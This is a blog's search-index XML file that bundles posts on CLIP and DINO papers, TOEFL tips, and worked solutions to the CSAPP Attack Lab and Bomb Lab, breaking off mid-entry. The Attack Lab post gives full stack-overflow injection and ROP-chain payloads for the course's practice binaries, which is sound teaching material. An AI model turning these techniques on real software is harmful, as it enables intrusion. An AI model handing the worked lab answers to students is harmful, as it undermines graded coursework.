local-search.xml
154 lines (72 loc) · 60.5 KB
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CLIP for Dense Tasks</title>
<link href="/2024/02/08/CLIP4Dense/"/>
<url>/2024/02/08/CLIP4Dense/</url>
<content type="html"><![CDATA[<p>#! <a href="https://zhuanlan.zhihu.com/p/681837427">https://zhuanlan.zhihu.com/p/681837427</a></p><h1 id="Extract-Free-Dense-Labels-from-CLIP-MaskCLIP"><a href="#Extract-Free-Dense-Labels-from-CLIP-MaskCLIP" class="headerlink" title="Extract Free Dense Labels from CLIP (MaskCLIP)"></a>Extract Free Dense Labels from CLIP (MaskCLIP)</h1><p>(ECCV 2022 Oral)</p><p><img src="/image-2.png"></p><p>Classify at the patch level by taking the dot product of each patch embedding with the text embeddings</p><h1 id="Perceptual-Grouping-in-Contrastive-Vision-Language-Models-CLIPpy"><a href="#Perceptual-Grouping-in-Contrastive-Vision-Language-Models-CLIPpy" class="headerlink" title="Perceptual Grouping in Contrastive Vision-Language Models (CLIPpy)"></a>Perceptual Grouping in Contrastive Vision-Language Models (CLIPpy)</h1><p>(ICCV 2023)</p><p><img src="/image-9.png"></p><h1 id="Open-Vocabulary-Semantic-Segmentation-with-Patch-Aligned-Contrastive-Learning-PACL"><a href="#Open-Vocabulary-Semantic-Segmentation-with-Patch-Aligned-Contrastive-Learning-PACL" class="headerlink" title="Open Vocabulary Semantic Segmentation with Patch Aligned Contrastive Learning (PACL)"></a>Open Vocabulary Semantic Segmentation with Patch Aligned Contrastive Learning (PACL)</h1><p>(CVPR 2023 Highlight)</p><p><img src="/image-7.png"></p><h2 id="Observation"><a href="#Observation" class="headerlink" title="Observation"></a>Observation</h2><ul><li>alignment between image and text <strong>at a patch level</strong> does not necessarily exist<br><img src="/image.png"></li><li>CLIP’s vision encoders outperform DINO on <strong>semantic coherence</strong> (semantically similar regions in images should produce similar patch representations in the vision encoder)<br><img src="/image-6.png"></li></ul><h2 id="Method"><a href="#Method" class="headerlink" title="Method"></a>Method</h2><p><img src="/image-8.png"></p><p>Patch Aligned Contrastive Learning: take a <em>weighted sum</em> over vision patch embeddings where the weights are obtained from the 
patch-level similarities with the text embedding.</p><h2 id="Experiments"><a href="#Experiments" class="headerlink" title="Experiments"></a>Experiments</h2><ul><li><p>Only train the small vision embedder on 30M image-text datasets.</p></li><li><p>Zero-shot Semantic Segmentation:</p><ul><li>Stride trick at inference: a change to the stride of the convolutional layer to extract image patches in ViT can provide better fine-grained patches at inference time.<br><img src="/image-10.png"></li></ul></li><li><p>Interesting findings:</p><ul><li>CLIP B/16 > CLIP L/14 > DINO B/16</li><li>PACL performance is positively correlated with the model’s semantic coherence</li></ul></li></ul><h1 id="SegCLIP-Patch-Aggregation-with-Learnable-Centers-for-Open-Vocabulary-Semantic-Segmentation"><a href="#SegCLIP-Patch-Aggregation-with-Learnable-Centers-for-Open-Vocabulary-Semantic-Segmentation" class="headerlink" title="SegCLIP: Patch Aggregation with Learnable Centers for Open-Vocabulary Semantic Segmentation"></a>SegCLIP: Patch Aggregation with Learnable Centers for Open-Vocabulary Semantic Segmentation</h1><p>(ICML 2023)</p><p><img src="/image-11.png"></p><h1 id="CLIPSelf-Vision-Transformer-Distills-Itself-for-Open-Vocabulary-Dense-Prediction"><a href="#CLIPSelf-Vision-Transformer-Distills-Itself-for-Open-Vocabulary-Dense-Prediction" class="headerlink" title="CLIPSelf: Vision Transformer Distills Itself for Open-Vocabulary Dense Prediction"></a>CLIPSelf: Vision Transformer Distills Itself for Open-Vocabulary Dense Prediction</h1><p>(ICLR 2024 Spotlight)</p><h2 id="Observation-1"><a href="#Observation-1" class="headerlink" title="Observation"></a>Observation</h2><p><img src="/image-3.png"></p><p>Comparing the classification accuracy of CLIP ResNet/ViT on image crops vs. dense features shows:</p><ul><li>For classifying the whole image and cropped images, ViT > ResNet</li><li>When classifying with representations pooled from the feature map, ViT drops a lot while ResNet is essentially unaffected</li></ul><p>Running K-Means clustering on the feature map and visualizing it shows that the ViT clusters are rather messy.</p><p>Possible reasons:</p><ul><li>ViT lacks local inductive bias, hindering the smooth transfer 
from representing pixels of a whole image to representing pixels of a local image region.</li><li>each spot on the dense feature map of the CLIP ViT tends to encode the global image.</li></ul><p>Verified with a retrieval experiment on images and regions: the dense features are well matched with the corresponding images, indicating that each location on the dense feature map tends to encode a global image representation.</p><h2 id="Method-1"><a href="#Method-1" class="headerlink" title="Method"></a>Method</h2><p><img src="/image-4.png"></p><p>The method is simple: since image crops classify better than dense features, distill the representations of image crops into the region representations pooled from the dense feature map!</p><ul><li>Image Patches as Regions: $m \times n$ patches.</li><li>Self-Distillation: align the region representations pooled from dense feature maps to the image representations of the corresponding image crops.</li></ul><p>$$<br>\mathcal{L} = \frac{1}{m \times n} \sum\limits_{i=0}^{m-1} \sum\limits_{j=0}^{n-1} \left(1-\frac{s_{\text {dense }}^{i j} \cdot t_{\text {image }}^{i j}}{\left|s_{\text {dense }}^{i j}\right| \cdot \left|t_{\text {image }}^{i j}\right|}\right)<br>$$</p><h2 id="Experiments-1"><a href="#Experiments-1" class="headerlink" title="Experiments"></a>Experiments</h2><ul><li><p>fine-tune CLIP on COCO</p></li><li><p>K-Means visualization:<br><img src="/image-5.png"></p></li><li><p>Open-Vocabulary Dense Prediction: used as the backbone for Open-Vocabulary Object Detection (F-VLM) / Semantic Segmentation (Cat-Seg) / Panoptic Segmentation (ODISE), the scores improve considerably.</p></li></ul>]]></content>
<categories>
<category>DL</category>
</categories>
</entry>
<entry>
<title>Fantastic DINO and Why They Pick It</title>
<link href="/2024/02/08/DINO/"/>
<url>/2024/02/08/DINO/</url>
<content type="html"><![CDATA[<p>#! <a href="https://zhuanlan.zhihu.com/p/681763809">https://zhuanlan.zhihu.com/p/681763809</a></p><h1 id="Emerging-Properties-in-Self-Supervised-Vision-Transformers-DINO"><a href="#Emerging-Properties-in-Self-Supervised-Vision-Transformers-DINO" class="headerlink" title="Emerging Properties in Self-Supervised Vision Transformers (DINO)"></a>Emerging Properties in Self-Supervised Vision Transformers (DINO)</h1><p>(ICCV 2021)</p><p>self-supervised ViT features contain explicit information about the semantic segmentation of an image:</p><ul><li><strong>explicit semantic information</strong> in attention maps<br><img src="/image.png"></li><li>different heads can attend to different semantic regions of an image<br><img src="/image-1.png"></li><li>Segment directly by taking the top 60% of patches in the attention map; supervised ViT does not have this nice property<br><img src="/image-2.png"></li><li>Pick some reference points and compute self-attention<br><img src="/image-3.png"></li></ul><h1 id="Localizing-Objects-with-Self-Supervised-Transformers-and-no-Labels-LOST"><a href="#Localizing-Objects-with-Self-Supervised-Transformers-and-no-Labels-LOST" class="headerlink" title="Localizing Objects with Self-Supervised Transformers and no Labels (LOST)"></a>Localizing Objects with Self-Supervised Transformers and no Labels (LOST)</h1><p>(BMVC 2021)</p><p>Object Discovery</p><p>leverage high-quality features obtained from DINO:</p><ul><li>use the <em>key</em> component of the last attention layer for computing the similarities between the different patches</li><li>localize a part of an object by selecting the patch with the least number of similar patches</li></ul><p><img src="/image-7.png"></p><h1 id="Unsupervised-Object-Localization-Observing-the-Background-to-Discover-Objects-FOUND"><a href="#Unsupervised-Object-Localization-Observing-the-Background-to-Discover-Objects-FOUND" class="headerlink" title="Unsupervised Object Localization: Observing the Background to Discover Objects (FOUND)"></a>Unsupervised Object 
Localization: Observing the Background to Discover Objects (FOUND)</h1><p>(CVPR 2023)</p><p>Foreground/background segmentation</p><p><img src="/image-6.png"></p><p>leverage attention maps in DINO:</p><ul><li>select one of the patches that received the <em>least attention</em><ul><li>some heads are noisy $\Rightarrow$ reduce the effect of noisy attention maps based on the sparsity concept<br><img src="/image-5.png"></li></ul></li><li>the background mask incorporates patches similar to this mined one</li></ul><h1 id="Bridging-the-Gap-to-Real-World-Object-Centric-Learning-DINOSAUR"><a href="#Bridging-the-Gap-to-Real-World-Object-Centric-Learning-DINOSAUR" class="headerlink" title="Bridging the Gap to Real-World Object-Centric Learning (DINOSAUR)"></a>Bridging the Gap to Real-World Object-Centric Learning (DINOSAUR)</h1><p>(ICLR 2023)</p><p><img src="/image-8.png"></p><p>reconstruct DINO features that have a high level of <strong>homogeneity within objects</strong></p><h1 id="Unsupervised-Semantic-Segmentation-with-Self-supervised-Object-centric-Representations"><a href="#Unsupervised-Semantic-Segmentation-with-Self-supervised-Object-centric-Representations" class="headerlink" title="Unsupervised Semantic Segmentation with Self-supervised Object-centric Representations"></a>Unsupervised Semantic Segmentation with Self-supervised Object-centric Representations</h1><p>(ICLR 2023 notable top 25%)</p><p><img src="/image-11.png"></p><ul><li>the attention maps of their DINO approach are not strong enough on a broad enough set of images to kickstart unsupervised semantic segmentation<br><img src="/image-9.png"></li><li>but their learned features within an object region yield clusters of surprisingly <strong>high purity</strong> and <strong>align well with underlying object categories</strong><br><img src="/image-10.png"></li></ul><h1 id="CLIP-DINOiser-Teaching-CLIP-a-few-DINO-tricks"><a href="#CLIP-DINOiser-Teaching-CLIP-a-few-DINO-tricks" class="headerlink" title="CLIP-DINOiser: Teaching CLIP a few 
DINO tricks"></a>CLIP-DINOiser: Teaching CLIP a few DINO tricks</h1><p><img src="/image-12.png"></p><p>integrate <strong>localization priors</strong> extracted from DINO:</p><ul><li>use the <em>value</em> embeddings, which have finer correlation than those of the key<br><img src="/image-14.png"></li><li>DINO features are more <strong>densely and accurately correlated</strong> than those of CLIP<br><img src="/image-13.png"></li></ul><h1 id="Vision-Transformers-Need-Registers"><a href="#Vision-Transformers-Need-Registers" class="headerlink" title="Vision Transformers Need Registers"></a>Vision Transformers Need Registers</h1><p>(ICLR 2024 Oral)</p><p>Investigates: why do artifacts emerge in the attention maps of ViTs other than DINO?<br><img src="/image-4.png"></p>]]></content>
<categories>
<category>DL</category>
</categories>
</entry>
<entry>
<title>TOEFL</title>
<link href="/2024/01/20/TOEFL/"/>
<url>/2024/01/20/TOEFL/</url>
<content type="html"><![CDATA[<p>Took the TOEFL this morning and painfully lost 2100 yuan.<br>My exam mindset needs adjusting. Don’t be too nervous; “you’re already here”, so just throw yourself fully into the exam.<br>Learning from the pain, I am putting together some lessons below.</p><h1 id="听力"><a href="#听力" class="headerlink" title="听力"></a>Listening</h1><p>Tips:</p><p>Focus on the topic</p><p>The opening may be a feint</p><p>Focus on the logic<br>What is the example meant to illustrate?</p><p>Watch for important connectives such as cause, however, etc.</p><p>Pay attention when the professor expresses feelings or opinions</p><p>Don’t relax when the ending drifts away from the topic</p><p>Choose carefully when an option contains a comparison (comparative form); such options often fabricate something not in the passage</p><h1 id="口语"><a href="#口语" class="headerlink" title="口语"></a>Speaking</h1><p>Transitions:</p><ul><li>Cause & Effect: accordingly, as a result, consequently, therefore</li><li>Combinations: additionally, furthermore, moreover, in addition, finally</li><li>Contrast: in contrast, however, on the other hand, although</li><li>Illustration: for instance, for example, to illustrate, specifically, to be specific</li></ul><h2 id="独立口语"><a href="#独立口语" class="headerlink" title="独立口语"></a>Independent Speaking</h2><p>Point 8’<br>Reason1 25’<br>Reason2 12’<br>(…)</p><p>All-purpose reasons:</p><ul><li>health (physical & mental)<br>unwind myself and ease my nerves</li><li>personal development<br>enlarge my vision</li><li>communication (w teachers / peers)<br>break the ice, broaden one’s social connection</li><li>emotion (friendship, kinship, teacher-student relationship)</li><li>convenience</li><li>efficiency</li><li>safety</li><li>economical</li><li>environmental protection</li></ul><h2 id="综合口语"><a href="#综合口语" class="headerlink" title="综合口语"></a>Integrated Speaking</h2><h3 id="Campus-Announcement-Discussion"><a href="#Campus-Announcement-Discussion" class="headerlink" title="Campus Announcement & Discussion"></a>Campus Announcement & Discussion</h3><p>In the reading passage, the university has decided to … (content of the decision) / In this letter, the student proposes that the university should … (content of the proposal).<br>This is because …</p><p>The woman in the conversation agrees / however disagrees with the decision / suggestion.<br>The first reason is that, (listening point 1)<br>In addition, she argues that (listening point 2)</p><p>(That’s why …)</p><h3 id="General-to-Specific"><a href="#General-to-Specific" class="headerlink" title="General to 
Specific"></a>General to Specific</h3><p>The subject of the lecture is …<br>The professor elaborates on this by providing two examples / an example.</p><p>The first concerns … / To begin with, he explains …</p><p>The second example is … / Next, he notes that …</p><p>(…)</p><h3 id="Academic-Lecture"><a href="#Academic-Lecture" class="headerlink" title="Academic Lecture"></a>Academic Lecture</h3><p>The main idea of the lecture is that …<br>The professor gives two examples of …</p><p>The first is that …</p><p>On the other hand, …</p><p>(These examples demonstrate …)</p><h1 id="写作"><a href="#写作" class="headerlink" title="写作"></a>Writing</h1><h2 id="综合写作"><a href="#综合写作" class="headerlink" title="综合写作"></a>Integrated Writing</h2><p>250+</p><p>Details</p><p>Logical connectives<br>Use fewer passives and fewer which-clauses</p><p>Structure:<br>The author of the passage believes that …<br>However, a professor provides a compelling counterpoint, contesting these claims with well-structured arguments.</p><p>Firstly, the professor challenges the author’s viewpoint that …<br>He posits a different perspective, emphasizing that …<br>He highlights …</p><p>Secondly, in contrast to the point made in the reading that …, the professor argues that …<br>He also corrects …, noting that …</p><p>Lastly, while the author implies that …, the professor presents a dissenting view.<br>He points out that …</p><h2 id="学术讨论写作"><a href="#学术讨论写作" class="headerlink" title="学术讨论写作"></a>Academic Discussion Writing</h2><p>120+</p><p>Structure:<br>Concession type<br>XX presents a compelling argument in favor of …<br>Admittedly,<br>However, considering …, I am inclined to<br>From my perspective,<br>In other words,<br>For example,<br>Therefore,</p><p>Supplement type<br>In my opinion,<br>I strongly agree with XX’s idea that …<br>I would add that …<br>XX raised the relevant point that …, but he/she did not mention that …<br>For example,</p>]]></content>
</entry>
<entry>
<title>Attack Lab</title>
<link href="/2023/12/18/Attack-Lab/"/>
<url>/2023/12/18/Attack-Lab/</url>
<content type="html"><![CDATA[<h1 id="Code-Injection"><a href="#Code-Injection" class="headerlink" title="Code Injection"></a>Code Injection</h1><p>Exploit a <strong>buffer overflow</strong> to attack <code>ctarget</code>.</p><h2 id="1"><a href="#1" class="headerlink" title="1"></a>1</h2><p>Idea: find the starting address of <code>touch1</code> so that returning from <code>getbuf</code> transfers control to <code>touch1</code>.</p><p>disas getbuf</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asm">sub $0x28,%rsp<br></code></pre></td></tr></table></figure><p>This shows that a 40-byte stack frame is allocated</p><p>We only need to input 48 bytes: the first 40 bytes fill <code>getbuf</code>’s stack space, and the last 8 bytes overwrite the return address with the address of <code>touch1</code>. Then, when <code>getbuf</code> executes the <code>retq</code> instruction, the program jumps to the <code>touch1</code> function.</p><p>disas touch1<br>The code address of <code>touch1</code> is found to be 0x4016ef</p><p>When writing the input file, note that the byte order is little-endian.</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs txt">00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>ef 16 40 00 00 00 00 00<br></code></pre></td></tr></table></figure><p>Run:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sh">./hex2raw < 1.txt | ./ctarget -q<br></code></pre></td></tr></table></figure><h2 id="2"><a href="#2" class="headerlink" title="2"></a>2</h2><p>In the second phase, besides modifying the return address and using the <code>ret</code> instruction to transfer control to <code>touch2</code>, we also need to pass an argument that must equal the cookie value.</p><p>Idea: inject a small amount of code in the attack string. Using two <code>ret</code>s, first return to the injected attack code, then return to <code>touch2</code>.</p><p><img src="/images/Attack-Lab/2.png"><br>After <code>getbuf</code> allocates its stack frame, %rsp points to 0x55622bd8; the first return should go here.</p><p>The injected code should:</p><ul><li>Store the cookie value in the first argument register %rdi</li><li>Push the address of <code>touch2</code> onto the stack</li><li>ret</li></ul><p>The cookie value is: 0x704163d2</p><p>disas touch2<br>The code address of <code>touch2</code> is found to be 0x40171b</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">movq $0x704163d2, %rdi<br>pushq $0x40171b<br>ret<br></code></pre></td></tr></table></figure><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sh">gcc -c 2.s<br>objdump -d 2.o > 2.d<br></code></pre></td></tr></table></figure><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs txt">48 c7 c7 d2 63 41 70 68<br>1b 17 40 00 c3 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>d8 2b 62 55 00 00 00 00<br></code></pre></td></tr></table></figure><h2 id="3"><a href="#3" class="headerlink" title="3"></a>3</h2><p>In the third phase, a string must be passed as the argument.</p><p>When <code>touch3</code> and <code>hexmatch</code> are called, they push data onto the stack, overwriting the buffer memory used by <code>getbuf</code>. To avoid being overwritten, the cookie string data should be stored on <code>test</code>’s stack.</p><p><img src="/images/Attack-Lab/3.png"><br>After <code>test</code> allocates its stack frame, %rsp points to 0x55622c08.<br>(Or, without looking it up, compute it directly from phase 2: 0x55622c08 = 0x55622bd8 + 0x28 + 0x8)<br>This is the address where the string is stored, and also the argument passed when calling <code>touch3</code>.</p><p>disas touch3<br>The code address of <code>touch3</code> is found to be 0x4017ef</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">movq $0x55622c08, %rdi<br>pushq 
$0x4017ef<br>ret<br></code></pre></td></tr></table></figure><p>Input 56 bytes. The first 40 bytes hold the byte representation of the injected code, the middle 8 bytes hold the address of the injected code to overwrite the return address, and the last 8 bytes hold the ASCII codes of the cookie.</p><p>Final stack layout:<br><img src="/images/Attack-Lab/3_stack.png" alt="来源 [CSAPP | Lab3-Attack Lab 深入解析 - 知乎](https://zhuanlan.zhihu.com/p/476396465)"></p><p>The cookie value 0x704163d2 converted to ASCII is: 37 30 34 31 36 33 64 32 00</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs txt">48 c7 c7 08 2c 62 55 68<br>ef 17 40 00 c3 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>d8 2b 62 55 00 00 00 00<br>37 30 34 31 36 33 64 32<br>00<br></code></pre></td></tr></table></figure><h1 id="Return-Oriented-Programming"><a href="#Return-Oriented-Programming" class="headerlink" title="Return-Oriented Programming"></a>Return-Oriented Programming</h1><p>Attacking <code>rtarget</code>: stack randomization + non-executable stack. What now?<br>Find specific instruction sequences ending in <code>ret</code> in the existing program and put them to our use: push the addresses of the pieces we need onto the stack, and each <code>ret</code> then fetches the next gadget. This forms a chain of code that carries out the attack.<br>We need to find useful gadgets in the gadget farm and carry out attacks similar to phases 2 and 3 above.</p><p><img src="/images/Attack-Lab/ROP.png" alt="ROP"></p><h2 id="4"><a href="#4" class="headerlink" title="4"></a>4</h2><p>Repeat the attack from phase 2, i.e. we need to assemble the following code:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">movq $0x704163d2, %rdi<br>pushq $0x40171b<br>ret<br></code></pre></td></tr></table></figure><p>Place the cookie on the stack, then use a pop instruction from a gadget to pop the stored cookie.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm"># gadget<br>popq %rdi # 5f<br>ret<br></code></pre></td></tr></table></figure><p>But 5f cannot be found in the farm</p><p>So we have to take a detour and use two gadgets:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs asm"># gadget 1<br>popq %rax # 58<br>ret<br># gadget 2<br>movq %rax, %rdi # 48 89 c7<br>ret<br></code></pre></td></tr></table></figure><p>Disassemble <code>rtarget</code></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sh">objdump -d rtarget > rtarget.s<br></code></pre></td></tr></table></figure><p>Search for 58:<br><img src="/images/Attack-Lab/4_1.png"><br>Address 401885</p><p>Search for 48 89 c7:<br><img src="/images/Attack-Lab/4_2.png"><br>Address 4018a6</p><hr><p>Final stack layout:<br><img src="/images/Attack-Lab/4_3.png" alt="来源 [CSAPP | Lab3-Attack Lab 深入解析 - 知乎](https://zhuanlan.zhihu.com/p/476396465)"></p><p>Write:</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs txt">00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>85 18 40 00 00 00 00 00<br>d2 63 41 70 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>1b 17 40 00 00 00 00 00<br></code></pre></td></tr></table></figure><h2 id="5"><a href="#5" class="headerlink" title="5"></a>5</h2><p>Repeat the attack from phase 3, which requires: in the end, %rdi holds the address of the cookie, then return to <code>touch3</code>.</p><p>The difference is that, because of stack randomization, we can no longer obtain the address of the cookie string directly as in phase 3.<br>Solution: obtain the value of %rsp in code, then add an offset to determine the address of the cookie.</p><p>How to add? There is an add gadget.<br><img src="/images/Attack-Lab/5_2.png"><br>Address 4018b6</p><p>Search for mov %rax, %rdi - 48 89 c7:<br><img src="/images/Attack-Lab/5_6.png"><br>Address 4018a6</p><p>Before that, the base address %rsp needs to be moved to %rdi and the offset to %rsi.</p><p>Search for mov %rsp, %___ - 48 89 e_:<br><img src="/images/Attack-Lab/5_1.png"><br>48 89 e0 - <code>mov %rsp, %rax</code><br>Address 4018bd</p><p>Search for <code>mov %rax, %rdi</code> - 48 89 c7:<br>Same as phase 4, address 4018a6</p><p>Now we have the base address; the offset still needs to be popped from the stack and then shuffled through a series of registers.</p><p>Search for <code>popq %rax</code> - 58:<br>Same as phase 4, address 401885</p><p>Searching in reverse order: the offset starts in %rax and needs to end up in %rsi. But the farm has no mov instruction with %rsi as the destination.<br>So we have to switch to movl on the lower 32 bits instead.</p><p>Search for movl %___, %esi:<br><img src="/images/Attack-Lab/5_3.png"><br>89 d6 - <code>movl %edx, %esi</code><br>Address 401988</p><p>Search for movl %___, %edx:<br><img src="/images/Attack-Lab/5_4.png"><br>Here, 84 c0 is testb, which does not affect the result<br>89 ca - <code>movl %ecx, %edx</code><br>Address 4018ca</p><p>Search for movl %___, %ecx:<br><img src="/images/Attack-Lab/5_5.png"><br>Here, 84 d2 is testb, which does not affect the result<br>89 c1 - <code>movl %eax, %ecx</code><br>Address 4018c4</p><hr><p>Final stack layout:<br><img src="/images/Attack-Lab/5.png" alt="来源 [CSAPP | Lab3-Attack Lab 深入解析 - 知乎](https://zhuanlan.zhihu.com/p/476396465),具体寄存器并不对应"></p><p>Offset 8 * 10 - 8 = 72 = 0x48 (when returning from getbuf, %rsp has moved up by one slot)<br>Write:</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs txt">00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>bd 18 40 00 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>85 18 40 00 00 00 00 00<br>48 00 00 00 00 00 00 00<br>c4 18 40 00 00 00 00 00<br>ca 18 40 00 00 00 00 00<br>88 19 40 00 00 00 00 00<br>b6 18 40 00 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>ef 17 40 00 00 00 00 00<br>37 30 34 31 36 33 64 32<br>00<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Bomb Lab</title>
<link href="/2023/12/18/Bomb-Lab/"/>
<url>/2023/12/18/Bomb-Lab/</url>
<content type="html"><![CDATA[<h1 id="gdb-基本使用"><a href="#gdb-基本使用" class="headerlink" title="gdb 基本使用"></a>Basic gdb usage</h1><p>See the textbook, p. 194</p><p>disassemble …</p><p>break …</p><p>nexti<br>stepi</p><p>continue</p><p>x /FMT ADDRESS<br>print EXP</p><p>run ARGS</p><h1 id="1-字符串比较"><a href="#1-字符串比较" class="headerlink" title="1 字符串比较"></a>1 String comparison</h1><p>layout asm</p><p>disas phase_1</p><p>Calls strings_not_equal<br>It must return 0 - equal</p><p>x /s 0x4024c0<br>“I am not part of the problem. I am a Republican.”<br>Write it into ans.txt</p><p>break phase_1<br>run ans.txt<br>nexti<br>print $eax</p><h1 id="2-循环"><a href="#2-循环" class="headerlink" title="2 循环"></a>2 Loop</h1><p>disas phase_2</p><p>Calls read_six_numbers:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">mov $<span class="hljs-number">0x4027b5</span>,%esi<br></code></pre></td></tr></table></figure><p>x /s 0x4027b5<br>“%d %d %d %d %d %d”</p><p>Calls sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th><th>%r8</th><th>%r9</th><th>(%rsp)</th><th>(%rsp+8)</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp</td><td>%rsp + 4</td><td>%rsp + 8</td><td>%rsp + 12</td><td>%rsp + 16</td><td>%rsp + 20</td></tr></tbody></table><p>Loop: the first number is 1, and each following number doubles the previous one<br>1 2 4 8 16 32</p><h1 id="3-条件-分支"><a href="#3-条件-分支" class="headerlink" title="3 条件/分支"></a>3 Conditionals/branches</h1><p>disas phase_3</p><p>Calls sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp + 12</td><td>%rsp + 8</td></tr></tbody></table><p>x /s 0x4027c1<br>“%d %d”</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0x7</span>,<span class="hljs-number">0xc</span>(%rsp)<br>ja<br></code></pre></td></tr></table></figure><p>The first number <= 7</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">jmpq *<span class="hljs-number">0x402520</span>(,%rax,<span class="hljs-number">8</span>)<br></code></pre></td></tr></table></figure><p>Let the first number = 1<br>x /x 0x402528<br>0x00400fc9</p><p>Second number 0x52</p><h1 id="4-递归调用和栈"><a href="#4-递归调用和栈" class="headerlink" title="4 递归调用和栈"></a>4 Recursive calls and the stack</h1><p>disas phase_4</p><p>Same as 3, calls sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp + 12</td><td>%rsp + 8</td></tr></tbody></table><p>x /s 0x4027c1<br>“%d %d”</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0xe</span>,<span class="hljs-number">0xc</span>(%rsp)<br>jbe<br></code></pre></td></tr></table></figure><p>The first number <= 14</p><p>Calls func4:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th></tr></thead><tbody><tr><td>first number</td><td>0</td><td>14</td></tr></tbody></table><p>disas func4</p><p>Recursive call</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">cmp $<span class="hljs-number">0xf</span>,%eax<br></code></pre></td></tr></table></figure><p>The return value must be f<br>First number = 5</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0xf</span>,<span class="hljs-number">0x8</span>(%rsp)<br></code></pre></td></tr></table></figure><p>Second number = f</p><h1 id="5-指针"><a href="#5-指针" class="headerlink" title="5 指针"></a>5 Pointers</h1><p>disas phase_5</p><p>Calls string_length</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
